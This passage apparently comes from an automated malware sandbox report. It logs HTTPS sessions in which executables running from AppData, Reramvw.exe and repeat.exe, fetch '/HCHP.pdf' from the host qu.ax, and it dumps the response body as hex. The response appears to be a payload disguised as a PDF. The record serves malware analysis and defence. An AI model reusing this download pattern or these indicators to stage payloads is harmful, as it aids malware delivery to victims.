a6 6e 4f
                                                                              Data Ascii: mhH^{8~Z1Lxf3lkc_*H~B+yvHnGp5pX/hb2f[WO0FH%\%%P4,y)D>*!j(yy^ [NeTSzn9>xFC,+J&=Oz&lW2ZNuFpT/tnO
                                                                              2024-02-21 20:09:13 UTC16384INData Raw: 13 c1 3f 19 67 77 40 79 a5 df 95 1e ec 0a 13 b0 13 06 ba d2 48 7a c1 bf 22 ae 3c f7 35 30 93 a0 ea f1 c8 13 d1 20 77 68 bd d4 c6 b3 c4 6f 7d d2 78 2b 24 4b 63 5f 2c ad c2 2f ec da fc 40 4d 6a 23 d4 cf 7f ce b3 38 04 02 f3 82 72 f3 fe 22 3d 86 1c 50 9f 0a 4b 9e c8 4e d3 5a 69 7c f5 18 5f 49 4b 53 e6 d7 d6 c4 ad 4e d1 c1 a6 d8 5b 5a b1 44 99 85 a1 2b c1 b7 49 5d aa 8b 26 48 68 5c cd af 65 83 fc 6f 9c 63 b0 3d 5c 4e 8a 3d 81 8e 79 94 16 4d 3f 47 f3 cc ea 8a a0 87 5d 00 0c 73 3c bf c3 be ab dc c3 e1 e5 69 9a 88 f3 37 dc 35 73 68 64 e2 6d d1 10 8e 05 54 ea 34 e2 7f f5 3f fc b2 53 ea 1d b2 43 fb 2c 10 2b 3e 93 cf ee 66 ed 6f ba 17 04 6b 25 50 8d be 9e e7 83 0b fa e8 97 1b da 9d 64 48 1b a5 37 e0 82 72 25 7e 35 90 60 ee 04 c8 81 9a d6 a2 a1 81 96 23 64 d9 19 1a
                                                                              Data Ascii: ?gw@yHz"<50 who}x+$Kc_,/@Mj#8r"=PKNZi|_IKSN[ZD+I]&Hh\eoc=\N=yM?G]s<i75shdmT4?SC,+>fok%PdH7r%~5`#d
                                                                              2024-02-21 20:09:13 UTC16384INData Raw: 90 37 f4 80 32 5f 8a 18 10 af ef ba cf 07 fc 5e ef 04 2e 6a 0a 7f 64 9c a4 32 f2 4f 57 a5 fc e5 7b 24 cd 30 a5 90 90 ea f1 43 fc 2a 1d f0 2b 34 da 4e 53 8b fd f9 03 89 a9 93 54 e8 26 d3 ad a6 e6 27 d9 42 f9 5a 69 cf 4f 1d 07 7e af 92 bb 27 6e 08 a8 b6 d0 ea 4c 6c f3 66 e4 83 51 48 e3 5a af 67 ac b9 72 e8 9a 2f f1 a2 20 d6 7c 96 bf 50 b5 4e 73 8b 20 c5 77 4d c3 a7 f8 dd ad 73 95 d2 5e 18 2a e9 6d 0b 4e 2c bd 1b b8 fa bd f8 23 a5 19 1f e6 b3 85 f1 8b 48 49 7c 7c 2b 81 fe bb 9f 5a 12 6d b2 ad 75 f4 bd 88 d1 c1 e5 97 25 60 1f 4a 01 17 ac 36 4a d1 85 b3 bd e8 14 8f 17 e9 5e b1 be 9e 38 9c 09 a6 80 33 ed 52 a7 58 a0 46 55 b1 47 49 3a 4f 53 02 50 e1 74 19 94 c5 05 65 a6 e1 4d 76 b5 21 e4 55 c1 a7 f5 5c 8f d6 61 c4 fe e7 18 51 eb 9d c3 b3 35 4f 5b 35 fb 05 3a 34
                                                                              Data Ascii: 72_^.jd2OW{$0C*+4NST&'BZiO~'nLlfQHZgr/ |PNs wMs^*mN,#HI||+Zmu%`J6J^83RXFUGI:OSPteMv!U\aQ5O[5:4


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.54972845.83.31.1874436472C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-02-21 20:09:22 UTC63OUTGET /HCHP.pdf HTTP/1.1
                                                                              Host: qu.ax
                                                                              Connection: Keep-Alive
                                                                              2024-02-21 20:09:22 UTC356INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Wed, 21 Feb 2024 20:09:22 GMT
                                                                              Content-Type: application/pdf
                                                                              Content-Length: 729088
                                                                              Connection: close
                                                                              Last-Modified: Wed, 21 Feb 2024 16:34:15 GMT
                                                                              Cache-Control: public, max-age=2592000
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                              Accept-Ranges: bytes
                                                                              2024-02-21 20:09:22 UTC16028INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              2024-02-21 20:09:22 UTC16384INData Raw: 9b 74 c0 e3 8d 71 be 07 f7 b7 2f 7e fc f9 a0 2d df 41 6b d3 b9 b2 c2 e1 df 8e 43 3e 4b c0 0e e5 87 0c 65 91 1f 2a 8d d3 c5 fd 41 09 71 11 d5 66 e6 4b 13 53 cf 81 11 92 aa f8 6f 71 a5 20 e7 32 2e a9 dc bf b3 6c 9b 88 6f 42 73 ba 49 e2 d1 b7 38 29 c8 26 28 60 b0 dc e2 4e 9f d1 33 16 ec 3c 65 20 2b af b1 e9 6c d3 7f 0f 08 7b ef 78 32 c3 7a 5d fe b2 36 77 49 b3 6b ca 70 ad a7 70 1a 9c 35 0c ea cf c3 75 1e 2e cc 8b db 4a 8a a7 b2 fa 53 61 9d cc a8 c9 fb 65 79 ba 7d a0 78 d1 c9 77 36 73 55 27 e9 4e 48 bd f8 6b 72 ff 4b c3 aa f1 8d 14 69 d1 e5 32 55 46 d6 d8 60 d4 a4 75 be 50 a6 22 14 f1 a6 d9 84 8b e5 16 78 86 cb 4f 1e b7 0a 07 b8 40 e8 c7 2d 4b 81 6a 98 27 e2 58 68 6d 95 6f bd 28 46 a0 a5 e1 9b c1 e8 32 84 db de 07 34 ef 38 50 2d 15 81 3b 05 4e 38 93 bd fb 52
                                                                              Data Ascii: tq/~-AkC>Ke*AqfKSoq 2.loBsI8)&(`N3<e +l{x2z]6wIkpp5u.JSaey}xw6sU'NHkrKi2UF`uP"xO@-Kj'Xhmo(F248P-;N8R
                                                                              2024-02-21 20:09:23 UTC16384INData Raw: 11 c7 28 d0 54 13 c7 56 eb 69 26 97 dc b2 84 1b 01 1e 12 db fe ea 93 74 a4 8b 03 cf 86 8e 8e f1 4d d6 3a 5d 2b c5 72 a6 81 40 75 2f 9c f5 b6 dc 7d 7f 9a 90 db ff 9e 8f 6a a4 d9 04 67 77 3f 41 e7 5e e1 8a 05 8d 14 30 a7 a2 2c 5a 52 03 f7 df 98 fe 84 8d 62 37 28 cc f7 c3 66 d1 71 2b 68 b9 ce c5 3b 75 ff 39 dd 4b 12 b5 13 d4 35 e4 16 0e 98 d8 c0 29 4e 56 2f 01 39 ff 25 1e b5 dd 95 1a 7a 3a b5 c1 d9 6a ab 2e 2e cc 21 0e 98 35 e0 af 47 5a 8b fb 78 cc 31 05 15 cc 48 b5 e1 02 ea e4 d1 25 01 ea 99 5a be e1 e6 1f 3a 8f bb 49 e4 47 d8 63 2b 11 51 52 e2 2d d2 2c 79 63 11 c4 05 b5 92 8a 96 b6 d0 94 b5 e0 b7 2b 7b cc 7f 7e a4 5d d2 4c f2 9c 81 e1 24 e6 01 b4 ac f7 f0 c9 aa e8 4d 63 71 86 b1 f4 d6 2d 5c 5e b4 8d ba c7 7f 93 3c 9f 3d 22 cf 5e cf 2a 98 bd a0 97 7a a6 56
                                                                              Data Ascii: (TVi&tM:]+r@u/}jgw?A^0,ZRb7(fq+h;u9K5)NV/9%z:j..!5GZx1H%Z:IGc+QR-,yc+{~]L$Mcq-\^<="^*zV
                                                                              2024-02-21 20:09:23 UTC16384INData Raw: 95 ff eb b8 11 77 87 e2 81 cd 3b 02 7d 69 4c ad fb c7 93 bc f9 84 22 36 1c f8 64 a0 38 4e e9 7d 80 c2 e4 1e 55 e2 bb 04 9a f9 d5 af 36 77 15 cb 68 cd 3a ac c7 be bd a9 16 0a 79 68 b3 58 18 22 34 49 b4 15 6d 4e 2b c1 67 64 19 4c 66 f9 72 2b 5f f2 08 46 86 58 37 ac c2 e2 60 53 61 1d 01 35 a0 05 7d 9f ba e1 f9 cf 66 e2 53 0b de 5e 52 fd 13 26 aa 34 29 2c 7f ec 3d 9a 04 4f 54 c5 cc 70 06 ca b1 20 38 cb c6 4d 3e dd fa db e8 cd 23 05 e7 7c fb 7d ce 44 47 b6 6d d1 df 43 e4 40 a5 61 4d 10 c7 40 81 52 d6 15 eb 98 31 64 c4 db ec 4a ef 10 73 9a 16 f1 64 ef 97 e5 a6 17 2e 4a c7 c3 67 a7 ed 53 fd f9 93 9e 97 06 c7 3a ba 46 ed 49 4c b1 bd ff 8d 5b 08 80 22 bc ae 08 d0 4b c6 73 dd 77 c4 6e ba 24 cd 1e 00 fc e2 27 1c e0 cf 6c 9e 58 90 46 2f a7 03 87 4c f4 2f 7e fa 25 b1
                                                                              Data Ascii: w;}iL"6d8N}U6wh:yhX"4ImN+gdLfr+_FX7`Sa5}fS^R&4),=OTp 8M>#|}DGmC@aM@R1dJsd.JgS:FIL["Kswn$'lXF/L/~%
                                                                              2024-02-21 20:09:23 UTC16384INData Raw: 66 e6 d0 55 67 89 50 fd c9 26 5b 77 33 7f e4 b7 c6 24 d5 a0 b9 cb 4b 0a f5 00 e4 3b fe 66 b2 29 cb 7b 03 62 0e 89 02 ee b7 ca 54 f1 8a 93 8b 11 5f 58 d3 7c d1 16 46 ef 57 b1 8b ee 52 ad 09 66 cf d0 b4 70 92 e4 9b be b5 1b b9 cc 40 fc 37 be d1 25 dd 3a 4c eb 29 c2 a1 e9 dd 74 24 49 5d be 82 ae e2 03 22 04 e7 e3 e6 35 4c 6d 22 ca 91 38 0c 23 8e 19 c6 d3 5f 25 37 cd 7e ee b2 d6 37 c0 17 e4 11 4f c8 11 ac e4 7f 68 ff b6 c2 09 46 76 90 c4 40 ca 21 58 89 e4 3e c1 b0 2f f3 af a7 e5 25 2e 45 1e d0 d9 dd a5 fe d7 b9 03 ff 50 2f 1a fb 55 ed 24 04 31 b9 d2 31 6c 49 29 bc d8 30 37 73 07 0a a7 fc 36 35 86 6c 01 43 24 72 bb 01 96 f5 7f 5f 59 a7 f9 eb 84 dc 51 d2 2f 97 5c c4 87 00 6f a7 2e 65 6a bf d5 b9 0b db 6d 35 55 aa 06 ce 4a 56 7b c4 39 ea 13 e8 68 7d 73 e7 59 2b
                                                                              Data Ascii: fUgP&[w3$K;f){bT_X|FWRfp@7%:L)t$I]"5Lm"8#_%7~7OhFv@!X>/%.EP/U$11lI)07s65lC$r_YQ/\o.ejm5UJV{9h}sY+
                                                                              2024-02-21 20:09:23 UTC16384INData Raw: d4 c1 b0 02 49 fc 31 ac 55 34 05 de 86 29 bd ff d7 50 99 4a 39 d1 50 b6 e1 c6 a9 71 6c e8 a6 0d 3d 3b e2 29 80 6f d8 93 9e 2a 59 3d 5d ef 6d 82 00 84 0c 9f cf 28 45 99 6d 33 ca 02 57 d9 55 5c 17 99 cc 65 43 77 28 be 2a ef 66 36 6a b5 8e b9 6d a9 2f 8f f7 6c f0 d1 a2 fe 8d 8d b3 01 f8 7e 89 ec f9 45 c8 2a ab a7 f9 05 e8 46 59 31 f6 76 3a b5 e8 63 b6 b3 35 4d 06 90 d0 74 dc 77 b0 34 a5 ac da c0 1d 08 73 75 db 8d c9 aa 17 51 78 1b e2 81 27 39 41 29 63 0a 0f a7 70 29 7b 39 1e b4 15 63 1c 53 5a 47 ce eb e8 b5 7b 24 48 46 b9 90 7c 1d c3 a6 77 91 b1 69 19 48 23 37 14 9f d3 15 8a d3 ed f0 57 19 98 18 f5 eb 2c a1 c3 8c db df 2f 17 ea a6 93 a5 44 b3 7d a0 ac 9a f6 9a dc 69 3f 82 2e 2a 9e e3 c3 b9 c4 22 da 1f 79 3d 04 de 22 f3 b4 29 5d 64 4d a8 b0 4e 6a fe fd d4 0e
                                                                              Data Ascii: I1U4)PJ9Pql=;)o*Y=]m(Em3WU\eCw(*f6jm/l~E*FY1v:c5Mtw4suQx'9A)cp){9cSZG{$HF|wiH#7W,/D}i?.*"y=")]dMNj
                                                                              2024-02-21 20:09:23 UTC16384INData Raw: 1c c8 22 eb 70 2c b9 66 98 09 df 9f 75 fb 0f 99 1f 20 d1 29 a4 e4 42 28 6c 5e 4c d8 db 17 8f 84 3e 95 b4 45 dd 70 6c 57 93 98 f7 80 b2 af 3f 59 5f cf df 19 0b 42 89 a7 7e 36 10 8e 56 a0 5e 99 41 ae 64 f6 2e c7 db 3d 66 08 c4 19 dc c2 ee 9f d4 c9 11 0a 66 aa a4 19 b8 62 db 5f 65 40 47 07 b2 f6 bd c1 27 71 d0 f4 13 9c 93 1c 37 a5 1b 3c e8 1b 63 1b 93 5a 7e cf b3 ae 93 9c 9b 11 9e f9 07 b7 c8 c8 32 65 8a 93 4e 61 61 cd f9 11 45 fd 93 3c 52 a3 b2 17 7f 6c d8 2c c3 45 44 35 cd 09 3a 32 f9 a5 e1 e7 31 51 c2 2b d2 c9 d3 8c 74 6e 23 c8 24 bf 70 a2 65 10 d1 ec 74 25 1e 0f 7e ef 8e cc 2a 2e 5f 8c 3a c2 a8 42 7f 2a f3 e5 a6 97 4e 5b d5 70 04 de 17 ba fa 56 05 8e 42 c6 6c e5 5c 07 5b 79 ed 7c e4 a5 bd 3b b0 c2 86 98 fd 1d e1 e3 ca 37 fb 96 c0 5b 0d 47 a8 93 e6 6a 62
                                                                              Data Ascii: "p,fu )B(l^L>EplW?Y_B~6V^Ad.=ffb_e@G'q7<cZ~2eNaaE<Rl,ED5:21Q+tn#$pet%~*._:B*N[pVBl\[y|;7[Gjb
                                                                              2024-02-21 20:09:23 UTC16384INData Raw: 6d 0a f4 a2 68 03 8c 1e c4 a0 48 5e 7b 38 7e d9 a3 04 88 5a 31 eb db 4c 78 66 da 33 1c 6c ec 6b 8d d5 63 13 5f 2a 9a d9 8a ef fd 8c c3 48 e5 0b b7 7e f9 42 9e 2b 9b d1 79 1c a2 76 86 06 12 e8 48 6e d1 a6 90 9a 47 70 0f 35 17 70 8b 58 f0 2f b6 a2 0d 68 c2 8e 8d 62 c5 32 c1 19 66 91 5b 57 e9 1a 4f 81 17 97 30 46 48 25 5c ff 1c 08 0b 18 86 25 b2 25 50 ed f3 e3 c9 34 2c b0 79 93 1e 1f 03 95 11 80 1c 29 44 3e 2a 21 92 6a 28 79 b0 9f ac 11 e2 79 5e 0c e3 20 0d 5b 1e 06 1e 4e bf 65 f9 54 eb 53 97 a5 7a e2 0b 6e b9 ff 01 8d 14 d6 39 3e 16 78 9d 0d d2 46 e6 43 2c 8c 2b 4a e9 c4 fd fd 9d e4 a0 0f 26 3d 4f ed d8 7a 1c 07 7f 98 c3 ea cd 26 99 de f8 ee 6c c4 84 57 8e 32 b0 fb 05 f7 5a 05 c5 d9 80 83 e7 cc 4e 75 0e 00 46 70 54 a9 94 bf d2 d3 2f fc 74 09 16 87 a6 6e 4f
                                                                              Data Ascii: mhH^{8~Z1Lxf3lkc_*H~B+yvHnGp5pX/hb2f[WO0FH%\%%P4,y)D>*!j(yy^ [NeTSzn9>xFC,+J&=Oz&lW2ZNuFpT/tnO
                                                                              2024-02-21 20:09:23 UTC16384INData Raw: 13 c1 3f 19 67 77 40 79 a5 df 95 1e ec 0a 13 b0 13 06 ba d2 48 7a c1 bf 22 ae 3c f7 35 30 93 a0 ea f1 c8 13 d1 20 77 68 bd d4 c6 b3 c4 6f 7d d2 78 2b 24 4b 63 5f 2c ad c2 2f ec da fc 40 4d 6a 23 d4 cf 7f ce b3 38 04 02 f3 82 72 f3 fe 22 3d 86 1c 50 9f 0a 4b 9e c8 4e d3 5a 69 7c f5 18 5f 49 4b 53 e6 d7 d6 c4 ad 4e d1 c1 a6 d8 5b 5a b1 44 99 85 a1 2b c1 b7 49 5d aa 8b 26 48 68 5c cd af 65 83 fc 6f 9c 63 b0 3d 5c 4e 8a 3d 81 8e 79 94 16 4d 3f 47 f3 cc ea 8a a0 87 5d 00 0c 73 3c bf c3 be ab dc c3 e1 e5 69 9a 88 f3 37 dc 35 73 68 64 e2 6d d1 10 8e 05 54 ea 34 e2 7f f5 3f fc b2 53 ea 1d b2 43 fb 2c 10 2b 3e 93 cf ee 66 ed 6f ba 17 04 6b 25 50 8d be 9e e7 83 0b fa e8 97 1b da 9d 64 48 1b a5 37 e0 82 72 25 7e 35 90 60 ee 04 c8 81 9a d6 a2 a1 81 96 23 64 d9 19 1a
                                                                              Data Ascii: ?gw@yHz"<50 who}x+$Kc_,/@Mj#8r"=PKNZi|_IKSN[ZD+I]&Hh\eoc=\N=yM?G]s<i75shdmT4?SC,+>fok%PdH7r%~5`#d
                                                                              2024-02-21 20:09:23 UTC16384INData Raw: 90 37 f4 80 32 5f 8a 18 10 af ef ba cf 07 fc 5e ef 04 2e 6a 0a 7f 64 9c a4 32 f2 4f 57 a5 fc e5 7b 24 cd 30 a5 90 90 ea f1 43 fc 2a 1d f0 2b 34 da 4e 53 8b fd f9 03 89 a9 93 54 e8 26 d3 ad a6 e6 27 d9 42 f9 5a 69 cf 4f 1d 07 7e af 92 bb 27 6e 08 a8 b6 d0 ea 4c 6c f3 66 e4 83 51 48 e3 5a af 67 ac b9 72 e8 9a 2f f1 a2 20 d6 7c 96 bf 50 b5 4e 73 8b 20 c5 77 4d c3 a7 f8 dd ad 73 95 d2 5e 18 2a e9 6d 0b 4e 2c bd 1b b8 fa bd f8 23 a5 19 1f e6 b3 85 f1 8b 48 49 7c 7c 2b 81 fe bb 9f 5a 12 6d b2 ad 75 f4 bd 88 d1 c1 e5 97 25 60 1f 4a 01 17 ac 36 4a d1 85 b3 bd e8 14 8f 17 e9 5e b1 be 9e 38 9c 09 a6 80 33 ed 52 a7 58 a0 46 55 b1 47 49 3a 4f 53 02 50 e1 74 19 94 c5 05 65 a6 e1 4d 76 b5 21 e4 55 c1 a7 f5 5c 8f d6 61 c4 fe e7 18 51 eb 9d c3 b3 35 4f 5b 35 fb 05 3a 34
                                                                              Data Ascii: 72_^.jd2OW{$0C*+4NST&'BZiO~'nLlfQHZgr/ |PNs wMs^*mN,#HI||+Zmu%`J6J^83RXFUGI:OSPteMv!U\aQ5O[5:4


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.54973345.83.31.1874436844C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-02-21 20:09:30 UTC63OUTGET /HCHP.pdf HTTP/1.1
                                                                              Host: qu.ax
                                                                              Connection: Keep-Alive
                                                                              2024-02-21 20:09:31 UTC356INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Wed, 21 Feb 2024 20:09:30 GMT
                                                                              Content-Type: application/pdf
                                                                              Content-Length: 729088
                                                                              Connection: close
                                                                              Last-Modified: Wed, 21 Feb 2024 16:34:15 GMT
                                                                              Cache-Control: public, max-age=2592000
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                              Accept-Ranges: bytes
                                                                              2024-02-21 20:09:31 UTC16028INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              2024-02-21 20:09:31 UTC16384INData Raw: 9b 74 c0 e3 8d 71 be 07 f7 b7 2f 7e fc f9 a0 2d df 41 6b d3 b9 b2 c2 e1 df 8e 43 3e 4b c0 0e e5 87 0c 65 91 1f 2a 8d d3 c5 fd 41 09 71 11 d5 66 e6 4b 13 53 cf 81 11 92 aa f8 6f 71 a5 20 e7 32 2e a9 dc bf b3 6c 9b 88 6f 42 73 ba 49 e2 d1 b7 38 29 c8 26 28 60 b0 dc e2 4e 9f d1 33 16 ec 3c 65 20 2b af b1 e9 6c d3 7f 0f 08 7b ef 78 32 c3 7a 5d fe b2 36 77 49 b3 6b ca 70 ad a7 70 1a 9c 35 0c ea cf c3 75 1e 2e cc 8b db 4a 8a a7 b2 fa 53 61 9d cc a8 c9 fb 65 79 ba 7d a0 78 d1 c9 77 36 73 55 27 e9 4e 48 bd f8 6b 72 ff 4b c3 aa f1 8d 14 69 d1 e5 32 55 46 d6 d8 60 d4 a4 75 be 50 a6 22 14 f1 a6 d9 84 8b e5 16 78 86 cb 4f 1e b7 0a 07 b8 40 e8 c7 2d 4b 81 6a 98 27 e2 58 68 6d 95 6f bd 28 46 a0 a5 e1 9b c1 e8 32 84 db de 07 34 ef 38 50 2d 15 81 3b 05 4e 38 93 bd fb 52
                                                                              Data Ascii: tq/~-AkC>Ke*AqfKSoq 2.loBsI8)&(`N3<e +l{x2z]6wIkpp5u.JSaey}xw6sU'NHkrKi2UF`uP"xO@-Kj'Xhmo(F248P-;N8R
                                                                              2024-02-21 20:09:31 UTC16384INData Raw: 11 c7 28 d0 54 13 c7 56 eb 69 26 97 dc b2 84 1b 01 1e 12 db fe ea 93 74 a4 8b 03 cf 86 8e 8e f1 4d d6 3a 5d 2b c5 72 a6 81 40 75 2f 9c f5 b6 dc 7d 7f 9a 90 db ff 9e 8f 6a a4 d9 04 67 77 3f 41 e7 5e e1 8a 05 8d 14 30 a7 a2 2c 5a 52 03 f7 df 98 fe 84 8d 62 37 28 cc f7 c3 66 d1 71 2b 68 b9 ce c5 3b 75 ff 39 dd 4b 12 b5 13 d4 35 e4 16 0e 98 d8 c0 29 4e 56 2f 01 39 ff 25 1e b5 dd 95 1a 7a 3a b5 c1 d9 6a ab 2e 2e cc 21 0e 98 35 e0 af 47 5a 8b fb 78 cc 31 05 15 cc 48 b5 e1 02 ea e4 d1 25 01 ea 99 5a be e1 e6 1f 3a 8f bb 49 e4 47 d8 63 2b 11 51 52 e2 2d d2 2c 79 63 11 c4 05 b5 92 8a 96 b6 d0 94 b5 e0 b7 2b 7b cc 7f 7e a4 5d d2 4c f2 9c 81 e1 24 e6 01 b4 ac f7 f0 c9 aa e8 4d 63 71 86 b1 f4 d6 2d 5c 5e b4 8d ba c7 7f 93 3c 9f 3d 22 cf 5e cf 2a 98 bd a0 97 7a a6 56
                                                                              Data Ascii: (TVi&tM:]+r@u/}jgw?A^0,ZRb7(fq+h;u9K5)NV/9%z:j..!5GZx1H%Z:IGc+QR-,yc+{~]L$Mcq-\^<="^*zV
                                                                              2024-02-21 20:09:31 UTC16384INData Raw: 95 ff eb b8 11 77 87 e2 81 cd 3b 02 7d 69 4c ad fb c7 93 bc f9 84 22 36 1c f8 64 a0 38 4e e9 7d 80 c2 e4 1e 55 e2 bb 04 9a f9 d5 af 36 77 15 cb 68 cd 3a ac c7 be bd a9 16 0a 79 68 b3 58 18 22 34 49 b4 15 6d 4e 2b c1 67 64 19 4c 66 f9 72 2b 5f f2 08 46 86 58 37 ac c2 e2 60 53 61 1d 01 35 a0 05 7d 9f ba e1 f9 cf 66 e2 53 0b de 5e 52 fd 13 26 aa 34 29 2c 7f ec 3d 9a 04 4f 54 c5 cc 70 06 ca b1 20 38 cb c6 4d 3e dd fa db e8 cd 23 05 e7 7c fb 7d ce 44 47 b6 6d d1 df 43 e4 40 a5 61 4d 10 c7 40 81 52 d6 15 eb 98 31 64 c4 db ec 4a ef 10 73 9a 16 f1 64 ef 97 e5 a6 17 2e 4a c7 c3 67 a7 ed 53 fd f9 93 9e 97 06 c7 3a ba 46 ed 49 4c b1 bd ff 8d 5b 08 80 22 bc ae 08 d0 4b c6 73 dd 77 c4 6e ba 24 cd 1e 00 fc e2 27 1c e0 cf 6c 9e 58 90 46 2f a7 03 87 4c f4 2f 7e fa 25 b1
                                                                              Data Ascii: w;}iL"6d8N}U6wh:yhX"4ImN+gdLfr+_FX7`Sa5}fS^R&4),=OTp 8M>#|}DGmC@aM@R1dJsd.JgS:FIL["Kswn$'lXF/L/~%
                                                                              2024-02-21 20:09:31 UTC16384INData Raw: 66 e6 d0 55 67 89 50 fd c9 26 5b 77 33 7f e4 b7 c6 24 d5 a0 b9 cb 4b 0a f5 00 e4 3b fe 66 b2 29 cb 7b 03 62 0e 89 02 ee b7 ca 54 f1 8a 93 8b 11 5f 58 d3 7c d1 16 46 ef 57 b1 8b ee 52 ad 09 66 cf d0 b4 70 92 e4 9b be b5 1b b9 cc 40 fc 37 be d1 25 dd 3a 4c eb 29 c2 a1 e9 dd 74 24 49 5d be 82 ae e2 03 22 04 e7 e3 e6 35 4c 6d 22 ca 91 38 0c 23 8e 19 c6 d3 5f 25 37 cd 7e ee b2 d6 37 c0 17 e4 11 4f c8 11 ac e4 7f 68 ff b6 c2 09 46 76 90 c4 40 ca 21 58 89 e4 3e c1 b0 2f f3 af a7 e5 25 2e 45 1e d0 d9 dd a5 fe d7 b9 03 ff 50 2f 1a fb 55 ed 24 04 31 b9 d2 31 6c 49 29 bc d8 30 37 73 07 0a a7 fc 36 35 86 6c 01 43 24 72 bb 01 96 f5 7f 5f 59 a7 f9 eb 84 dc 51 d2 2f 97 5c c4 87 00 6f a7 2e 65 6a bf d5 b9 0b db 6d 35 55 aa 06 ce 4a 56 7b c4 39 ea 13 e8 68 7d 73 e7 59 2b
                                                                              Data Ascii: fUgP&[w3$K;f){bT_X|FWRfp@7%:L)t$I]"5Lm"8#_%7~7OhFv@!X>/%.EP/U$11lI)07s65lC$r_YQ/\o.ejm5UJV{9h}sY+
                                                                              2024-02-21 20:09:31 UTC16384INData Raw: d4 c1 b0 02 49 fc 31 ac 55 34 05 de 86 29 bd ff d7 50 99 4a 39 d1 50 b6 e1 c6 a9 71 6c e8 a6 0d 3d 3b e2 29 80 6f d8 93 9e 2a 59 3d 5d ef 6d 82 00 84 0c 9f cf 28 45 99 6d 33 ca 02 57 d9 55 5c 17 99 cc 65 43 77 28 be 2a ef 66 36 6a b5 8e b9 6d a9 2f 8f f7 6c f0 d1 a2 fe 8d 8d b3 01 f8 7e 89 ec f9 45 c8 2a ab a7 f9 05 e8 46 59 31 f6 76 3a b5 e8 63 b6 b3 35 4d 06 90 d0 74 dc 77 b0 34 a5 ac da c0 1d 08 73 75 db 8d c9 aa 17 51 78 1b e2 81 27 39 41 29 63 0a 0f a7 70 29 7b 39 1e b4 15 63 1c 53 5a 47 ce eb e8 b5 7b 24 48 46 b9 90 7c 1d c3 a6 77 91 b1 69 19 48 23 37 14 9f d3 15 8a d3 ed f0 57 19 98 18 f5 eb 2c a1 c3 8c db df 2f 17 ea a6 93 a5 44 b3 7d a0 ac 9a f6 9a dc 69 3f 82 2e 2a 9e e3 c3 b9 c4 22 da 1f 79 3d 04 de 22 f3 b4 29 5d 64 4d a8 b0 4e 6a fe fd d4 0e
                                                                              Data Ascii: I1U4)PJ9Pql=;)o*Y=]m(Em3WU\eCw(*f6jm/l~E*FY1v:c5Mtw4suQx'9A)cp){9cSZG{$HF|wiH#7W,/D}i?.*"y=")]dMNj
                                                                              2024-02-21 20:09:31 UTC16384INData Raw: 1c c8 22 eb 70 2c b9 66 98 09 df 9f 75 fb 0f 99 1f 20 d1 29 a4 e4 42 28 6c 5e 4c d8 db 17 8f 84 3e 95 b4 45 dd 70 6c 57 93 98 f7 80 b2 af 3f 59 5f cf df 19 0b 42 89 a7 7e 36 10 8e 56 a0 5e 99 41 ae 64 f6 2e c7 db 3d 66 08 c4 19 dc c2 ee 9f d4 c9 11 0a 66 aa a4 19 b8 62 db 5f 65 40 47 07 b2 f6 bd c1 27 71 d0 f4 13 9c 93 1c 37 a5 1b 3c e8 1b 63 1b 93 5a 7e cf b3 ae 93 9c 9b 11 9e f9 07 b7 c8 c8 32 65 8a 93 4e 61 61 cd f9 11 45 fd 93 3c 52 a3 b2 17 7f 6c d8 2c c3 45 44 35 cd 09 3a 32 f9 a5 e1 e7 31 51 c2 2b d2 c9 d3 8c 74 6e 23 c8 24 bf 70 a2 65 10 d1 ec 74 25 1e 0f 7e ef 8e cc 2a 2e 5f 8c 3a c2 a8 42 7f 2a f3 e5 a6 97 4e 5b d5 70 04 de 17 ba fa 56 05 8e 42 c6 6c e5 5c 07 5b 79 ed 7c e4 a5 bd 3b b0 c2 86 98 fd 1d e1 e3 ca 37 fb 96 c0 5b 0d 47 